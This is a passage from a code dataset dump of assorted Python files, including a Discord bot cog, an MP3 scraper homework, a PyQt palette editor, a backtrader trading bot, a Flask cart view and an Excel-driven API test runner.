ml2_models.DistributedPortBinding.host ==\n agent_host)\n return (query1.count() + query2.count() + ha_port_count)\n\n\ndef get_ha_router_active_port_count(session, agent_host, network_id):\n # Return num of HA router interfaces on the given network and host\n query = _ha_router_interfaces_on_network_query(session, network_id)\n query = query.filter(models_v2.Port.status == const.PORT_STATUS_ACTIVE)\n query = query.join(agent_model.Agent)\n query = query.filter(agent_model.Agent.host == agent_host)\n return query.count()\n","sub_path":"neutron/plugins/ml2/drivers/l2pop/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":8075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"335127369","text":"import discord\nfrom discord.ext import commands\nimport json\nimport asyncio\nimport typing\nfrom .db_checks import is_mod\nfrom .db_converters import SmartMember\n\n\nclass db_info(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n with open(\"src/data/information.json\", \"r\") as json_file:\n self.info_dict = json.load(json_file)\n\n def save_json_dict(self, dict):\n with open(\"src/data/information.json\", \"w\") as json_file:\n json.dump(dict, json_file)\n\n def lowercase_keys_get(self, dict, match):\n for key in dict.keys():\n if match.lower() in key.lower():\n return key\n @commands.command()\n async def info(self, ctx, topic : typing.Optional[str],*, subtopic : typing.Optional[str]):\n topickey = None\n subtopickey = None\n if topic:\n topickey = self.lowercase_keys_get(self.info_dict, topic)\n if topickey and subtopic:\n subtopickey = self.lowercase_keys_get(self.info_dict[topickey], subtopic)\n\n if topic and topickey and (not subtopic or not subtopickey):\n subtopics_list = []\n topicinfo = \"\"\n for st in self.info_dict[topickey].keys():\n if st.lower() != topickey.lower():\n subtopics_list.append(st)\n else:\n topicinfo = self.info_dict[topickey][st]\n if len(subtopics_list) > 0:\n subtopics_list.sort(key=str.lower)\n allinfo_str = topicinfo+\"\\n\\n**Subtopics**\\n\"+\"```\\n\"+\"\\n\".join(subtopics_list)+\"\\n```\"+f\"Use `~info {topic} ` to learn more about a subtopic.\"\n else:\n allinfo_str = topicinfo\n infoEmbed = discord.Embed(title=f\"`{topickey}`\", description =allinfo_str, color=0xffb6c1)\n usemessage = f\"Info was used for topic `{topickey}`\"\n elif topic and topickey and subtopic and subtopickey:\n infoEmbed = discord.Embed(title = f\"`{topickey} : {subtopickey}`\", description = self.info_dict[topickey][subtopickey], color=0xffb6c1)\n\n usemessage = f\"Info was used for {subtopickey} in {topic}\"\n\n else:\n\n topiclist = list(self.info_dict.keys())\n topiclist.sort(key=str.lower)\n topiclist_str = '```\\n'+'\\n'.join(topiclist)+'\\n```'+'Use `~info ` to see information and subtopics.'\n infoEmbed = discord.Embed(title = \"Topics\", description = topiclist_str, color=0xffb6c1)\n usemessage = \"Info was used.\"\n\n await ctx.send(embed=infoEmbed)\n testserver = self.bot.get_guild(622553382279708672)\n infotrackchannel = testserver.get_channel(713113119861375007)\n await infotrackchannel.send(usemessage)\n\n @commands.group()\n async def editinfo(self, ctx):\n if ctx.invoked_subcommand is None:\n await ctx.send('Improper editinfo command.')\n\n @editinfo.command()\n async def addtopic(self, ctx, topic : str):\n if topic in self.info_dict:\n await ctx.send(\"This topic was already added.\")\n else:\n self.info_dict[topic] = {}\n self.save_json_dict(self.info_dict)\n await ctx.send('Topic 
added.')\n\n @editinfo.command()\n async def removetopic(self, ctx, topic : str):\n\n if topic in self.info_dict:\n await ctx.send(f'Are you sure you want to delete `{topic}` from `info`?')\n def delete_response(m):\n return m.author == ctx.author and m.channel == ctx.channel and (m.content.lower() == \"yes\" or m.content.lower() == \"no\")\n try:\n response = await self.bot.wait_for('message', check = delete_response, timeout = 120.0)\n except asyncio.TimeoutError:\n await ctx.send('Response timed out.')\n else:\n if response.content.lower() == \"yes\":\n del self.info_dict[topic]\n self.save_json_dict(self.info_dict)\n await ctx.send(f'`{topic}` deleted.')\n else:\n await ctx.send(f'Deletion canceled')\n else:\n await ctx.send('This is not a topic in `info`.')\n\n @editinfo.command()\n async def addsubtopic(self, ctx, topic: str, subtopic : str):\n if topic in self.info_dict:\n if subtopic in self.info_dict[topic]:\n await ctx.send(f'**Warning: This subtopic already exists and this command will overwrite it.** \\n \\nInput the information for `{subtopic}` below or type `cancel` to leave this menu.')\n else:\n await ctx.send(f'Input the information for `{subtopic}` below or type `cancel` to leave this menu.')\n\n def info_response(m):\n return m.author == ctx.author and m.channel == ctx.channel\n try:\n response = await self.bot.wait_for('message', check = info_response, timeout = 120.0)\n except asyncio.TimeoutError:\n await ctx.send('Response timed out.')\n else:\n if response.content.lower() == \"cancel\":\n await ctx.send('Command canceled')\n else:\n self.info_dict[topic][subtopic] = response.content\n await ctx.send(f'`{subtopic}` has been added.')\n self.save_json_dict(self.info_dict)\n else:\n await ctx.send(\"This is not a topic in `info`.\")\n @editinfo.command()\n async def removesubtopic(self, ctx, topic : str, subtopic : str):\n if topic in self.info_dict:\n if subtopic in self.info_dict[topic]:\n await ctx.send(f'Are you sure you want to delete `{subtopic}`?')\n def delete_response(m):\n return m.author == ctx.author and m.channel == ctx.channel and (m.content.lower() == \"yes\" or m.content.lower() == \"no\")\n try:\n response = await self.bot.wait_for('message', check = delete_response, timeout = 120.0)\n except asyncio.TimeoutError:\n await ctx.send('Response timed out.')\n else:\n if response.content.lower() == \"yes\":\n del self.info_dict[topic][subtopic]\n self.save_json_dict(self.info_dict)\n await ctx.send(f'`{subtopic}` deleted from {topic}.')\n else:\n await ctx.send(f'Deletion canceled')\n else:\n await ctx.send(f'This is not a subtopic under `{topic}`.')\n else:\n await ctx.send('This is not a topic in `info`.')\n\n @commands.command()\n @is_mod()\n async def sendinfo(self, ctx, member : SmartMember, topic : str,*, subtopic : typing.Optional[str]):\n topickey = None\n subtopickey = None\n if topic:\n topickey = self.lowercase_keys_get(self.info_dict, topic)\n if topickey and subtopic:\n subtopickey = self.lowercase_keys_get(self.info_dict[topickey], subtopic)\n\n if topic and topickey and (not subtopic or not subtopickey):\n subtopics_list = []\n topicinfo = \"\"\n for st in self.info_dict[topickey].keys():\n if st.lower() != topickey.lower():\n subtopics_list.append(st)\n else:\n topicinfo = self.info_dict[topickey][st]\n if len(subtopics_list) > 0:\n allinfo_str = topicinfo+\"\\n\\n**Subtopics**\\n\"+\"```\\n\"+\"\\n\".join(subtopics_list)+\"\\n```\"+\"Use `~info ` to learn more about a subtopic.\"\n else:\n allinfo_str = topicinfo\n infoEmbed = 
discord.Embed(title=topic, description =allinfo_str, color=0xffb6c1)\n if topickey == \"Reporting\":\n infoEmbed.set_image(url=\"https://i.imgur.com/6OD4GWr.png\")\n await member.send(embed=infoEmbed)\n await ctx.send(f'Sent info about `{topickey}` to {member}')\n\n elif topic and topickey and subtopic and subtopickey:\n infoEmbed = discord.Embed(title = f\"`{subtopic}` in `{topic}`\", description = self.info_dict[topickey][subtopickey], color=0xffb6c1)\n await member.send(embed=infoEmbed)\n await ctx.send(f'Sent info about `{subtopickey}` in `{topickey}` to {member}')\n\n else:\n await ctx.send('Topic not found.')\n\n async def cog_command_error(self, ctx, error):\n print(error)\n await ctx.send(f'Error: {error}')\n","sub_path":"src/db_modules/db_info.py","file_name":"db_info.py","file_ext":"py","file_size_in_byte":8552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"71674621","text":"# -*- encoding: utf-8 -*-\n'''\n@File : 03_wegt.py\n@Time : 2020/04/29 15:12:17\n@Author : xdbcb8 \n@Version : 1.0\n@Contact : xdbcb8@qq.com\n@WebSite : www.xdbcb8.com\n'''\n\n# here put the import lib\n\n# 给定一个网址(包含了优质的英语学习音频文件),http://www.listeningexpress.com/studioclassroom/ad/; 请大家写一个爬虫,将里面的英语节目MP3,都下载下来;\n# 这些音频文件 在网页的html文件内容都是以mp3结尾的,如下图所示:\n\n# 要求大家使用Requests库获取这个网页html文本内容,并且使用正则表达式获取里面所有的mp3文件的网址;并进行下载;\n# Windows上的wget可以点击这里 下载。 这个程序不用安装,直接在命令行里使用即可;\n# 注意:\n# 获取的音频网址前面需要加上 前缀 http://www.listeningexpress.com/studioclassroom/ad/ 才是完整的下载地址\n# MP3文件中有空格字符,组成下载网址时,需要进行url编码,否则空格会被当成命令行分隔符。参考代码如下所示\n# >>> from urllib.parse import quote\n# >>> quote('2019-04-13 NEWSworthy Clips.mp3')\n# '2019-04-13%20NEWSworthy%20Clips.mp3'\n\n'''\n题目是错的,有sc-ad, 不能url编码\n'''\n\nimport re\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nimport lxml\nfrom urllib.parse import quote\nimport wget\n\ntry:\n os.chdir(r'pythonhomework\\homework7')\nexcept FileNotFoundError as identifier:\n print(identifier)\n\n\nwith open('wget.txt', 'w', encoding = 'utf-8') as f:\n url = r'http://www.listeningexpress.com/studioclassroom/ad/'\n html = requests.get(url).text\n f.write(html)\n\ntext = []\nwith open('wget.txt', 'r', encoding = 'utf-8') as f:\n #不能用beautifulsoup筛选,因为留下的文本是网页上显示的,不是所需要的连接\n # html = f.read()\n # bs_get = BeautifulSoup(html, 'lxml')\n # text = bs_get.find_all(text = True)\n text = f.readlines()\n # for t in text:\n # print(t)\n\n\n#html文本处理,文本清洗\n# print('-------------------------------------------------------------------')\n# text = set(text)\n# print(text)\nretext = r'sc-ad.*\\.mp3'\nanoretext = r'sc-ad.{20,40}\\.mp3'\nrelist = []\n\n# for t in text:\n# pipei = re.search(retext, t)\n# if pipei:\n# relist.append(\"http://www.listeningexpress.com/studioclassroom/ad/\" + quote(pipei.group()[5 : ])) #url编码,合并网址\n#网址存在问题因此要重新修改正则匹配\nfor t in text:\n pipei = re.search(retext, t)\n if pipei:\n relist.append(pipei.group())\n# print(relist)\n#清洗文本\nrelist = re.findall(anoretext, relist[0])\nfor i,k in enumerate(relist):\n relist[i] = \"http://www.listeningexpress.com/studioclassroom/ad/\" + k #sc-ad 也是不要的\n print(relist[i])\n\ntry:\n os.chdir(r'.\\mp3download')\nexcept FileNotFoundError as identifier:\n print(identifier)\n\nfor t in relist:\n wget.download(t)\n","sub_path":"homework7/03_wegt.py","file_name":"03_wegt.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"407170462","text":"# Definition for singly-linked list.\n# class ListNode:\n# def 
__init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n'''\n Time Complexity: O(n * logn) where n is the number of nodes in the linked list. We find the middle of the linked list which takes logn time then create a TreeNode \n for every node in the linked list which takes n time.\n \n'''\nclass Solution:\n def sortedListToBST(self, head: Optional[ListNode]) -> Optional[TreeNode]:\n if not head:\n return\n elif not head.next:\n return TreeNode(head.val)\n\n slow, fast, prev = head, head, None\n \n while(fast != None and fast.next != None):\n fast = fast.next.next\n prev = slow\n slow = slow.next\n\n node = TreeNode(slow.val)\n prev.next = None\n \n node.left = self.sortedListToBST(head)\n node.right = self.sortedListToBST(slow.next)\n \n return node\n","sub_path":"Convert Sorted list to Binary Search Tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"255478753","text":"from PyQt5.QtWidgets import QColorDialog, QPushButton, QWidget, QHBoxLayout, QRadioButton, \\\r\n QLabel, QListWidget, QButtonGroup, QListWidgetItem, QUndoCommand\r\nfrom PyQt5.QtCore import Qt, pyqtSignal\r\nfrom PyQt5.QtGui import QColor, QPixmap\r\n\r\nclass ColorDisplay(QPushButton):\r\n colorChanged = pyqtSignal(int, QColor)\r\n\r\n def __init__(self, idx, window):\r\n super(ColorDisplay, self).__init__(window)\r\n self.window = window\r\n self.idx = idx\r\n self._color = None\r\n\r\n self.setMinimumHeight(16)\r\n self.setMaximumHeight(16)\r\n self.setMinimumWidth(16)\r\n self.setMaximumWidth(16)\r\n self.resize(16, 16)\r\n self.pressed.connect(self.onColorPicker)\r\n\r\n def set_color(self, color, create=False):\r\n if create:\r\n self.change_color(color)\r\n else:\r\n palette_list = self.window.window.window\r\n command = CommandColorChange(\r\n palette_list, self.window.window.idx, self.idx, color, \r\n \"%d: Changing Color from %s to %s\" % (self.idx, self._color, color))\r\n self.window.main_editor.undo_stack.push(command)\r\n\r\n def change_color(self, color):\r\n if color != self._color:\r\n self._color = color\r\n self.colorChanged.emit(self.idx, QColor(color))\r\n\r\n if self._color:\r\n self.setStyleSheet(\"background-color: %s;\" % self._color)\r\n else:\r\n self.setStyleSheet(\"\")\r\n\r\n def color(self):\r\n return self._color\r\n\r\n def onColorPicker(self):\r\n dlg = QColorDialog()\r\n if self._color:\r\n dlg.setCurrentColor(QColor(self._color))\r\n if dlg.exec_():\r\n self.set_color(dlg.currentColor().name())\r\n\r\n def mousePressEvent(self, e):\r\n if e.button() == Qt.RightButton:\r\n self.set_color(QColor(\"black\").name())\r\n\r\n return super(ColorDisplay, self).mousePressEvent(e)\r\n\r\nclass PaletteDisplay(QWidget):\r\n def __init__(self, colors, window):\r\n super(PaletteDisplay, self).__init__(window)\r\n self.window = window\r\n self.main_editor = self.window.window.window\r\n\r\n self.color_display_list = []\r\n\r\n self.layout = QHBoxLayout()\r\n self.layout.setSpacing(0)\r\n self.layout.setMargin(0)\r\n self.layout.setContentsMargins(0, 0, 0, 0)\r\n self.setLayout(self.layout)\r\n\r\n for idx, color in enumerate(colors):\r\n color_display = ColorDisplay(idx, self)\r\n color_display.set_color(color.name(), create=True)\r\n 
color_display.colorChanged.connect(self.on_color_change)\r\n self.layout.addWidget(color_display, 0, Qt.AlignCenter)\r\n self.color_display_list.append(color_display)\r\n\r\n def set_color(self, idx, color):\r\n self.color_display_list[idx].set_color(color.name())\r\n\r\n def on_color_change(self, idx, color):\r\n self.main_editor.update_view()\r\n\r\nclass PaletteFrame(QWidget):\r\n def __init__(self, idx, image_filename=None, image_map=None, window=None):\r\n super(PaletteFrame, self).__init__(window)\r\n self.window = window\r\n\r\n self.idx = idx\r\n if image_filename and image_map:\r\n self.name = image_filename[:-4].split('-')[-1]\r\n palette = self.get_palette_from_image(image_filename, image_map)\r\n\r\n self.create_widgets(palette)\r\n\r\n def create_widgets(self, palette):\r\n layout = QHBoxLayout()\r\n self.setLayout(layout)\r\n\r\n radio_button = QRadioButton()\r\n self.window.radio_button_group.addButton(radio_button, self.idx)\r\n radio_button.clicked.connect(lambda: self.window.set_current_palette(self.idx))\r\n self.name_label = QLabel(self.name)\r\n copy = QPushButton(\"Duplicate\")\r\n copy.clicked.connect(lambda: self.window.duplicate(self.idx))\r\n self.palette_display = PaletteDisplay(palette, self)\r\n layout.addWidget(radio_button)\r\n layout.addWidget(self.name_label)\r\n layout.addWidget(self.palette_display)\r\n layout.addWidget(copy)\r\n\r\n def get_colors(self):\r\n return [color_display.color() for color_display in self.palette_display.color_display_list]\r\n\r\n def set_name(self, name):\r\n self.name = name\r\n self.name_label.setText(name)\r\n\r\n def get_color_display(self, idx):\r\n return self.palette_display.color_display_list[idx]\r\n\r\n def get_color(self, idx):\r\n return self.palette_display.color_display_list[idx].color()\r\n\r\n def set_color(self, idx, color):\r\n self.palette_display.set_color(idx, color)\r\n\r\n def get_palette_from_image(self, fn, image_map):\r\n colors = []\r\n pixmap = QPixmap(fn)\r\n image = pixmap.toImage()\r\n colors = [QColor(\"black\")] * 16\r\n for x in range(image.width()):\r\n for y in range(image.height()):\r\n grid_index = image_map.get(x, y)\r\n color = QColor(image.pixel(x, y))\r\n while grid_index > len(colors) - 1:\r\n colors.append(QColor(\"black\")) # Sometimes more than 16 colors\r\n # if color != colors[grid_index]:\r\n # print(grid_index, colors[grid_index].getRgb(), color.getRgb())\r\n colors[grid_index] = color\r\n # Make sure there are always at least 16 colors\r\n # print(len(colors))\r\n # colors.extend([QColor(\"black\")] * (16 - len(colors)))\r\n\r\n return colors\r\n\r\n @classmethod\r\n def from_palette(cls, new_idx, palette_frame, window):\r\n p = cls(new_idx, None, None, window)\r\n p.name = palette_frame.name\r\n color_list = [QColor(c) for c in palette_frame.get_colors()]\r\n p.create_widgets(color_list)\r\n return p\r\n\r\nclass PaletteList(QListWidget):\r\n def __init__(self, window=None):\r\n super(PaletteList, self).__init__(window)\r\n self.window = window\r\n self.uniformItemSizes = True\r\n\r\n self.list = []\r\n self.current_index = 0\r\n self.radio_button_group = QButtonGroup()\r\n\r\n def add_palette_from_image(self, image_filename, image_map):\r\n print(image_filename)\r\n item = QListWidgetItem(self)\r\n self.addItem(item)\r\n pf = PaletteFrame(len(self.list), image_filename, image_map, self)\r\n self.list.append(pf)\r\n item.setSizeHint(pf.minimumSizeHint())\r\n self.setItemWidget(item, pf)\r\n # Try and make it the right size\r\n 
self.setMinimumWidth(self.sizeHintForColumn(0))\r\n return pf\r\n\r\n def remove_last_palette(self):\r\n print('Removing last palette!')\r\n self.takeItem(len(self.list) - 1)\r\n self.list.pop()\r\n\r\n def duplicate(self, idx):\r\n command = CommandDuplicate(self, idx, \"Duplicate Palette %d\" % idx)\r\n self.window.undo_stack.push(command)\r\n\r\n def set_current_palette(self, idx):\r\n self.current_index = idx\r\n self.radio_button_group.button(idx).setChecked(True)\r\n self.window.palette_text.setText(self.get_current_palette().name)\r\n self.window.update_view()\r\n\r\n def get_current_palette(self):\r\n return self.list[self.current_index]\r\n\r\n def get_last_palette(self):\r\n return self.list[-1]\r\n\r\n def get_palette(self, idx):\r\n return self.list[idx]\r\n\r\n def clear(self):\r\n print('PaletteList clear')\r\n # Need to remove things in reverse order, duh\r\n for idx, l in reversed(list(enumerate(self.list))):\r\n print(idx)\r\n self.takeItem(idx)\r\n l.deleteLater()\r\n self.list = []\r\n self.current_index = 0\r\n\r\nclass CommandDuplicate(QUndoCommand):\r\n def __init__(self, palette_list, idx, description):\r\n super(CommandDuplicate, self).__init__(description)\r\n self.palette_list = palette_list\r\n self.old_idx = palette_list.current_index\r\n self.idx = idx\r\n\r\n def redo(self):\r\n new_idx = len(self.palette_list.list)\r\n item = QListWidgetItem(self.palette_list)\r\n self.palette_list.addItem(item)\r\n new_pf = PaletteFrame.from_palette(new_idx, self.palette_list.list[self.idx], self.palette_list)\r\n self.palette_list.list.append(new_pf)\r\n item.setSizeHint(new_pf.minimumSizeHint())\r\n self.palette_list.setItemWidget(item, new_pf)\r\n\r\n def undo(self):\r\n # Delete last item\r\n self.palette_list.takeItem(self.palette_list.count() - 1)\r\n self.palette_list.list.pop()\r\n self.palette_list.set_current_palette(self.old_idx)\r\n\r\nclass CommandColorChange(QUndoCommand):\r\n def __init__(self, palette_list, palette_idx, color_idx, new_color, description):\r\n super(CommandColorChange, self).__init__(description)\r\n self.palette_list = palette_list\r\n self.palette_idx = palette_idx\r\n self.color_idx = color_idx\r\n self.old_color = self.palette_list.get_palette(palette_idx).get_color(color_idx)\r\n self.new_color = new_color\r\n\r\n def change_color(self, color):\r\n color_display = self.palette_list.get_palette(self.palette_idx).get_color_display(self.color_idx)\r\n color_display.change_color(color)\r\n\r\n def redo(self):\r\n self.change_color(self.new_color)\r\n\r\n def undo(self):\r\n self.change_color(self.old_color)\r\n","sub_path":"Utilities/Production/palette_editor_code/PaletteList.py","file_name":"PaletteList.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"188135744","text":"#!/usr/bin/env python3\n\nimport time\nimport backtrader as bt\nimport datetime as dt\n\nfrom ccxtbt import CCXTStore\nfrom config import BINANCE, ENV, PRODUCTION, COIN_TARGET, COIN_REFER, DEBUG\n\nfrom dataset.dataset import CustomDataset,OneTokenDataset\nfrom sizer.percent import FullMoney\nfrom strategies.random import BasicRandom\nfrom utils import print_trade_analysis, print_sqn, send_telegram_message\nimport os\n\ndef main():\n cerebro = bt.Cerebro(quicknotify=True)\n\n if ENV == PRODUCTION: # Live trading with Binance\n broker_config = {\n 'apiKey': os.environ.get('okex_key'),\n 'secret': os.environ.get('okex__secret'),\n 'nonce': lambda: str( int( time.time() * 1000 ) 
),\n 'enableRateLimit': True,\n }\n\n store = CCXTStore( exchange='okex', currency='USDT', config=broker_config, retries=5, debug=DEBUG )\n\n broker_mapping = {\n 'order_types': {\n bt.Order.Market: 'market',\n bt.Order.Limit: 'limit',\n bt.Order.Stop: 'stop-loss',\n bt.Order.StopLimit: 'stop limit'\n },\n 'mappings': {\n 'closed_order': {\n 'key': 'status',\n 'value': 'closed'\n },\n 'canceled_order': {\n 'key': 'status',\n 'value': 'canceled'\n }\n }\n }\n\n okex = store.getbroker(broker_mapping=broker_mapping)\n print( okex.getcash(),okex.getvalue() )\n\n #cerebro.setbroker(okex)\n\n broker = cerebro.getbroker()\n broker.setcommission( commission=0.001, name=COIN_TARGET )\n broker.setcash( 100000.0 )\n cerebro.addsizer( FullMoney )\n\n initial_value = cerebro.broker.getvalue()\n print( 'Starting Portfolio Value: %.2f' % initial_value )\n\n\n\n hist_start_date = dt.datetime.utcnow() - dt.timedelta(minutes=30000)\n data = store.getdata(\n dataname='%s/%s' % (COIN_TARGET, COIN_REFER),\n name='%s%s' % (COIN_TARGET, COIN_REFER),\n timeframe=bt.TimeFrame.Minutes,\n #fromdate=hist_start_date,\n fromdate=dt.datetime( 2018, 1, 1 ),\n todate=dt.datetime( 2018, 12, 31 ),\n compression=15,\n ohlcv_limit=None\n )\n\n # Add the feed\n #cerebro.adddata(data)\n cerebro.resampledata( data, timeframe=bt.TimeFrame.Minutes, compression=30 )\n\n else: # Backtesting with CSV file\n data = OneTokenDataset(\n name='btc',\n dataname=\"dataset/candles_okef_btc.usd.t_2018-11-11_2018-12-12_5m.csv\",\n timeframe=bt.TimeFrame.Minutes,\n #fromdate=dt.datetime(2018, 11, 11,11,11),\n #todate=dt.datetime(2018, 11, 10,11,11),\n compression = 5,\n nullvalue=0.0,\n dtformat = 1,\n )\n\n cerebro.adddata(data)\n #cerebro.resampledata(data, timeframe=bt.TimeFrame.Minutes, compression=5)\n\n broker = cerebro.getbroker()\n broker.setcommission(commission=0.001, name=COIN_TARGET)\n broker.setcash(10000.0)\n cerebro.addsizer(FullMoney)\n\n # Analyzers to evaluate trades and strategies\n # SQN = Average( profit / risk ) / StdDev( profit / risk ) x SquareRoot( number of trades )\n cerebro.addanalyzer(bt.analyzers.TradeAnalyzer, _name=\"ta\")\n cerebro.addanalyzer(bt.analyzers.SQN, _name=\"sqn\")\n\n # Include Strategy\n cerebro.addstrategy(BasicRandom)\n\n # Print analyzers - results\n initial_value = cerebro.broker.getvalue()\n print('Starting Portfolio Value: %.2f' % initial_value)\n\n #exit()\n result = cerebro.run()\n final_value = cerebro.broker.getvalue()\n print('Final Portfolio Value: %.2f' % final_value)\n print('Profit %.3f%%' % ((final_value - initial_value) / initial_value * 100))\n\n #exit()\n print_trade_analysis(result[0].analyzers.ta.get_analysis())\n print_sqn(result[0].analyzers.sqn.get_analysis())\n\n if True: #DEBUG:\n cerebro.plot()\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print(\"finished.\")\n time = dt.datetime.now().strftime(\"%d-%m-%y %H:%M\")\n #send_telegram_message(\"Bot finished by user at %s\" % time)\n except Exception as err:\n send_telegram_message(\"Bot finished with error: %s\" % err)\n print(\"Finished with error: \", err)\n raise\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"623140039","text":"from flask import Blueprint, request, render_template, redirect, url_for\nfrom app.order.models import (\n get_active_order,\n get_order_items,\n update_quantity_order,\n delete_item_order\n)\nfrom app.products.models 
import get_order_products\nfrom flask_login import login_required, current_user\n\norder = Blueprint(\"order\", __name__, url_prefix=\"\")\n\n\n@order.route('/shop_cart', methods=['GET', 'POST'])\n@login_required\ndef show_shop_cart():\n '''\n method GET = Obtiene los productos de una orden y los pasa al template\n para ser mostrados, obtiene tambien el costo de la orden y la cantidad\n de productos\n methos POST = Actualiza la cantidad de articulos del carrito\n '''\n\n # obtener es estado de la orden (activa)\n active_order = get_active_order(current_user)\n # Si es activa obtiene los items que componene la orden()\n\n if active_order:\n order_items = get_order_items(active_order)\n if order_items:\n order_products = get_order_products(order_items)\n else:\n order_products = None\n order_items = None\n else:\n order_products = None\n order_items = None\n\n if request.method == \"GET\":\n\n # Poner estas variables como vacias (no como None) y poder usar zip()\n if order_products is None or order_items is None:\n order_products = []\n order_items = []\n # Unir las consultas\n products = zip(order_items, order_products)\n # Costos para modulo de pago\n prices = []\n descriptions = []\n total = 0\n for item in order_items:\n prices.append(item)\n total += item.order_item_price\n for product in order_products:\n descriptions.append(product)\n values = products\n\n iva = total*0.19\n\n my_info = {\"products\": products, \"values\": values, \"total\": total,\n \"iva\": iva}\n\n if request.method == \"POST\":\n order_item_id = int(request.form.get(\"order_item_id\"))\n action = request.form.get(\"action\")\n\n if action == \"update\":\n quantity = int(request.form.get(\"quantity\"))\n update_quantity_order(order_item_id, quantity)\n\n elif action == \"erase\":\n delete_item_order(order_item_id)\n\n return redirect(url_for('order.show_shop_cart'))\n\n return render_template('shop_cart.html', my_info=my_info)\n","sub_path":"Seminario de Ing Soft/Proyecto/Codigo/app/order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"228192842","text":"# -*- coding: utf-8 -*-\n__author__ = 'jaundice'\n# 第二天模仿了一下,又写的一遍\n\ndef longestPalindrome(s):\n plain=[[False]*len(s) for ll in range(len(s))]\n count=1\n start=0\n end=0\n for i in range(0,len(s)):\n for j in range(0,i):\n if s[i]==s[j] and (i-j<=2 or plain[j+1][i-1]):\n plain[j][i]=True\n if i-j>count:\n count=i-j\n start=j\n end=i\n return s[start:end+1]\n\ns=\"12321sdf\"\nprint(longestPalindrome(s))\n","sub_path":"回文数.py","file_name":"回文数.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"347005513","text":"# --*-- encoding:utf-8 --*--\nimport os\nimport requests\nimport subprocess\nimport to_html\nfrom log import logging\nfrom datetime import date\n\ntry:\n from openpyxl import load_workbook\n from lxml import etree\nexcept ImportError as e:\n subprocess.call(\"pip install openpyxl\", shell=True)\n subprocess.call(\"pip install lxml\", shell=True)\n from openpyxl import load_workbook\n from lxml import etree\n\n\ndef check_version(response):\n check_version = None\n # print(response.content)\n if \"text/html\" in response.headers['Content-Type']:\n page = etree.HTML((response.content.decode(\"utf-8\")).lower())\n\n infos = page.xpath(\"//h3\")\n\n for info in infos:\n # 原则上均能获取到版本号\n if \"version:\" in info.text:\n check_version = 
info.text\n elif \"application/json\" in response.headers['Content-Type']:\n check_version = eval(str(response.content, encoding=\"utf-8\"))['version']\n\n # print(check_version)\n\n return check_version\n\n\ndef history_data_append(wb):\n \"\"\"\n 当前针对Excel表的固定单元格进行填写,要求Excel表格数据格式与模板保持一致\n :param wb:\n :return:\n \"\"\"\n # wb = load_workbook(\"./testcase/前海API测试用例.xlsx\", data_only=True)\n sheet = wb['Analysis']\n # max_row 为当前表格最大行号\n row_num = sheet.max_row + 1\n\n # A7~H7分别代表版本号、当前版本case总数,当前版本整体通过率、当前版本high优先级case通过率\n # Issue总数、High优先级issue总数、Medium优先级issue总数 、low优先级issue总数\n logging.info(\"开始追加历史版本数据\")\n sheet[\"A%d\" % row_num].value = sheet[\"A7\"].value\n sheet[\"B%d\" % row_num].value = sheet[\"B7\"].value\n sheet[\"C%d\" % row_num].value = sheet[\"C7\"].value\n sheet[\"D%d\" % row_num].value = sheet[\"D7\"].value\n sheet[\"E%d\" % row_num].value = sheet[\"E7\"].value\n sheet[\"F%d\" % row_num].value = sheet[\"F7\"].value\n sheet[\"G%d\" % row_num].value = sheet[\"G7\"].value\n sheet[\"H%d\" % row_num].value = sheet[\"H7\"].value\n\n logging.info(\"历史版本数据追加完成\")\n\n # wb.save(\"./testcase/\" + case)\n\n # print(sheet[\"A7\"].value)\n\n\ndef api_test():\n try:\n cases = os.listdir(\"./testcase/\")\n for case in cases:\n # 表格中行数,调用api_test()时从第i行开始读取数据\n i = 3\n wb = load_workbook(\"./testcase/\" + case, data_only=True)\n sheet = wb[\"TestCase\"]\n checked_version = check_version(requests.get(sheet[\"G2\"].value))\n if checked_version != sheet[\"M2\"].value:\n logging.info(\"checked %s update and the %s is Testing\" % (checked_version, case))\n while sheet[\"B%d\" % i].value is not None:\n try:\n url = sheet[\"G%d\" % i].value\n params = sheet[\"H%d\" % i].value.encode('utf-8')\n headers = {'Content-Type': 'application/json'}\n\n # 确认请求类型\n if sheet[\"F%d\" % i].value == \"Post\":\n response = requests.post(url, data=params, headers=headers)\n elif sheet[\"F%d\" % i].value == \"Get\":\n response = requests.get(url, data=params, headers=headers)\n elif sheet[\"F%d\" % i].value == \"Put\":\n response = requests.put(url, data=params, headers=headers)\n elif sheet[\"F%d\" % i].value == \"Update\":\n response = requests.update(url, data=params, headers=headers)\n elif sheet[\"F%d\" % i].value == \"Delete\":\n response = requests.delete(url, data=params, headers=headers)\n else:\n logging.error(\n case + \" \" + sheet[\"A%d\" % i].value + \" request method \" + sheet[\"F%d\" % i].value +\n \" not support, please contact the admin\")\n continue\n\n # 将返回的状态码写入测试结果\n sheet[\"K%d\" % i] = response.status_code\n # 判断返回的状态码与预期是否一致,不一致则直接fail,一致则进一步判断返回值是否包含相应的关键字\n if response.status_code == sheet[\"I%d\" % i].value:\n if sheet[\"J%d\" % i].value in response.content.decode(\"utf-8\"):\n sheet[\"L%d\" % 